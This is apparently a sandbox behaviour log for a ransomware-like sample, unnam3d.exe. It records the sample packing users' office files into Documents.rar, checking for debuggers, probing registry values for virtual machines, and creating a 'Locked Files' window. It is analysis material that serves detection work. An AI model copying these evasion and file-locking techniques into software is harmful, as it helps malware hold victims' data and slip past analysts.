File Create filename = LUsVMCA2kX5.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14359481313 True 1
Fn
File Read filename = LUsVMCA2kX5.xlsx, size = 1048576, size_out = 21639 True 1
Fn
Data
File Read filename = LUsVMCA2kX5.xlsx, size = 1026937, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Performance Ctr, time = 14359645449 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 4
Fn
System Get Time type = Performance Ctr, time = 14359879626 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 3
Fn
File Write filename = Documents.rar, size = 21728 True 1
Fn
Data
File Write filename = Documents.rar, size = 100 True 1
Fn
Data
File Create filename = M-At.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14360223914 True 1
Fn
File Read filename = M-At.docx, size = 1048576, size_out = 82118 True 1
Fn
Data
File Read filename = M-At.docx, size = 966458, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Performance Ctr, time = 14360385126 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 3
Fn
System Get Time type = Ticks, time = 10909118 True 1
Fn
System Get Time type = Performance Ctr, time = 14361070378 True 1
Fn
System Get Time type = Ticks, time = 10909118 True 3
Fn
File Write filename = Documents.rar, size = 82320 True 1
Fn
Data
File Write filename = Documents.rar, size = 93 True 1
Fn
Data
File Create filename = M53FxPpcT\-GriIsafw.csv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909118 True 1
Fn
System Get Time type = Ticks, time = 10909118 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14361904546 True 1
Fn
File Read filename = M53FxPpcT\-GriIsafw.csv, size = 1048576, size_out = 82993 True 1
Fn
Data
File Read filename = M53FxPpcT\-GriIsafw.csv, size = 965583, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909134 True 1
Fn
System Get Time type = Performance Ctr, time = 14362288350 True 1
Fn
System Get Time type = Ticks, time = 10909134 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10909134 True 1
Fn
System Get Time type = Performance Ctr, time = 14363151967 True 1
Fn
System Get Time type = Ticks, time = 10909134 True 3
Fn
File Write filename = Documents.rar, size = 83200 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = M53FxPpcT\1ue2Dui.csv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909134 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14363686749 True 1
Fn
File Read filename = M53FxPpcT\1ue2Dui.csv, size = 1048576, size_out = 50145 True 1
Fn
Data
File Read filename = M53FxPpcT\1ue2Dui.csv, size = 998431, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 1
Fn
System Get Time type = Performance Ctr, time = 14364004512 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 4
Fn
System Get Time type = Performance Ctr, time = 14364574864 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 3
Fn
File Write filename = Documents.rar, size = 50288 True 1
Fn
Data
File Write filename = Documents.rar, size = 105 True 1
Fn
Data
File Create filename = M53FxPpcT\FCaj7Z UR1.ots, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909149 True 1
Fn
System Get Time type = Ticks, time = 10909149 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14365019038 True 1
Fn
File Read filename = M53FxPpcT\FCaj7Z UR1.ots, size = 1048576, size_out = 20944 True 1
Fn
Data
File Read filename = M53FxPpcT\FCaj7Z UR1.ots, size = 1027632, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 1
Fn
System Get Time type = Performance Ctr, time = 14365630037 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 4
Fn
System Get Time type = Performance Ctr, time = 14365874690 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 3
Fn
File Write filename = Documents.rar, size = 21056 True 1
Fn
Data
File Write filename = Documents.rar, size = 108 True 1
Fn
Data
File Create filename = M53FxPpcT\oGJkVukoMxIO6MpIrH.xls, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909165 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14366253309 True 1
Fn
File Read filename = M53FxPpcT\oGJkVukoMxIO6MpIrH.xls, size = 1048576, size_out = 63479 True 1
Fn
Data
File Read filename = M53FxPpcT\oGJkVukoMxIO6MpIrH.xls, size = 985097, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 1
Fn
System Get Time type = Performance Ctr, time = 14366419678 True 1
Fn
System Get Time type = Ticks, time = 10909165 True 3
Fn
System Get Time type = Ticks, time = 10909181 True 1
Fn
System Get Time type = Performance Ctr, time = 14366999869 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 3
Fn
File Write filename = Documents.rar, size = 63584 True 1
Fn
Data
File Write filename = Documents.rar, size = 116 True 1
Fn
Data
File Create filename = M53FxPpcT\s4EDs60 8.csv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909181 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14367460509 True 1
Fn
File Read filename = M53FxPpcT\s4EDs60 8.csv, size = 1048576, size_out = 45623 True 1
Fn
Data
File Read filename = M53FxPpcT\s4EDs60 8.csv, size = 1002953, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 1
Fn
System Get Time type = Performance Ctr, time = 14367704930 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 4
Fn
System Get Time type = Performance Ctr, time = 14368087488 True 1
Fn
System Get Time type = Ticks, time = 10909181 True 3
Fn
File Write filename = Documents.rar, size = 45712 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = mevC_E6.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909196 True 1
Fn
System Get Time type = Ticks, time = 10909196 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14368823880 True 1
Fn
File Read filename = mevC_E6.docx, size = 1048576, size_out = 31620 True 1
Fn
Data
File Read filename = mevC_E6.docx, size = 1016956, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909196 True 1
Fn
System Get Time type = Performance Ctr, time = 14369013033 True 1
Fn
System Get Time type = Ticks, time = 10909196 True 4
Fn
System Get Time type = Performance Ctr, time = 14369543199 True 1
Fn
System Get Time type = Ticks, time = 10909196 True 3
Fn
File Write filename = Documents.rar, size = 31680 True 1
Fn
Data
File Write filename = Documents.rar, size = 96 True 1
Fn
Data
File Create filename = N-1n4D-yiI1zNCjze.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14369938975 True 1
Fn
File Read filename = N-1n4D-yiI1zNCjze.pptx, size = 1048576, size_out = 38855 True 1
Fn
Data
File Read filename = N-1n4D-yiI1zNCjze.pptx, size = 1009721, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = Performance Ctr, time = 14370107026 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 4
Fn
System Get Time type = Performance Ctr, time = 14370452631 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 3
Fn
File Write filename = Documents.rar, size = 38976 True 1
Fn
Data
File Write filename = Documents.rar, size = 106 True 1
Fn
Data
File Create filename = N5ZN.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14370837413 True 1
Fn
File Read filename = N5ZN.pptx, size = 1048576, size_out = 76712 True 1
Fn
Data
File Read filename = N5ZN.pptx, size = 971864, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 1
Fn
System Get Time type = Performance Ctr, time = 14371030845 True 1
Fn
System Get Time type = Ticks, time = 10909212 True 3
Fn
System Get Time type = Ticks, time = 10909227 True 1
Fn
System Get Time type = Performance Ctr, time = 14371737775 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 3
Fn
File Write filename = Documents.rar, size = 76880 True 1
Fn
Data
File Write filename = Documents.rar, size = 93 True 1
Fn
Data
File Create filename = N8uU1e.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909227 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:30 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14372202558 True 1
Fn
File Read filename = N8uU1e.xlsx, size = 1048576, size_out = 27261 True 1
Fn
Data
File Read filename = N8uU1e.xlsx, size = 1021315, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 1
Fn
System Get Time type = Performance Ctr, time = 14372474913 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 4
Fn
System Get Time type = Performance Ctr, time = 14372766487 True 1
Fn
System Get Time type = Ticks, time = 10909227 True 3
Fn
File Write filename = Documents.rar, size = 27328 True 1
Fn
Data
For performance reasons, the remaining 797 entries are omitted.
The remaining entries can be found in glog.xml.
Process #9: unnam3d.exe
11336 0
»
Information Value
ID #9
File Name c:\users\whuoxysd\appdata\local\temp\unnam3d.exe
Command Line "C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:55, Reason: Autostart
Unmonitor End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration 00:03:28
OS Process Information
»
Information Value
PID 0x730
Parent PID 0x6bc (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 734
0x 7F4
0x 7F8
0x 7FC
0x 4EC
0x 4F4
0x 580
0x 6C8
0x 6D8
0x 728
Hook Information
»
Type Installer Target Size Information Actions
Code agiledotnetrt.dll:+0xfc2e6 ntdll.dll:DbgBreakPoint+0x0 1 bytes -
...
Code agiledotnetrt.dll:+0x4b698 clrjit.dll:sxsJitStartup+0x1e3bd 4 bytes -
...
Threads
Thread 0x734
562 0
»
Category Operation Information Success Count Logfile
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x713b0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75900000 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x75c60000 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74f30000 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x76fc0000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75f70000 True 1
Fn
Module Load module_name = shlwapi.dll, base_address = 0x75c00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759111a9 True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Debug Hide c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = IsUserAnAdmin, address_out = 0x75fc44f5 True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe False 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x76fdfda0 True 1
Fn
System Get Info type = SYSTEM_MODULE_INFORMATION True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, value_name = DriverDesc, data = 83 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = VideoBiosVersion, data = 76 False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\crypt32.dll, base_address = 0x75710000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\psapi.dll, base_address = 0x75100000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\version.dll, base_address = 0x74ad0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75c60000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75900000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x76fee026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlLeaveCriticalSection, address_out = 0x76fe2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlEnterCriticalSection, address_out = 0x76fe22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlInitializeCriticalSection, address_out = 0x76ff2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlReAllocateHeap, address_out = 0x77001f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlSizeHeap, address_out = 0x76ff3002 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x713c142e True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x713b0000 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x713c142e True 1
Fn
Module Load module_name = clrjit.dll, base_address = 0x741f0000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, function = getJit, address_out = 0x7423f70e True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 260 True 1
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, desired_access = FILE_READ_DATA, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 510104, size_out = 510104 True 1
Fn
Data
Environment Get Environment String name = UKKED False 1
Fn
System Get Time type = System Time, time = 2019-04-02 08:05:44 (UTC) True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x737b0000 True 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75c60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x76ff25dd True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 85788894 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 9
Fn
Module Load module_name = RichEd20.DLL, base_address = 0x72f80000 True 1
Fn
Module Get Filename module_name = RichEd20.DLL, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Windows\system32\RichEd20.DLL, size = 260 True 1
Fn
File Get Info filename = C:\Windows\system32\RichEd20.DLL, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 2
Fn
Environment Get Environment String name = UKKED False 4
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create window_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, wndproc_parameter = 0 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 4
Fn
Environment Get Environment String name = UKKED False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE.config, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 6
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 85789094 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 2
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 21
Fn
System Get Cursor x_out = 1232, y_out = 631 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 1
Fn
System Get Cursor x_out = 1232, y_out = 631 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 30
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
System Get Cursor x_out = 1232, y_out = 631 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 85789822 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 85789862 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 65888 False 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 65888 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
System Get Cursor x_out = 1232, y_out = 631 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -16, new_long = 33619968 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -20, new_long = 65536 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 1928863994 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 85789942 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -12, new_long = 65894 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85791366 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65896 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 85791406 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 65898 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85791446 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65900 False 1
Fn
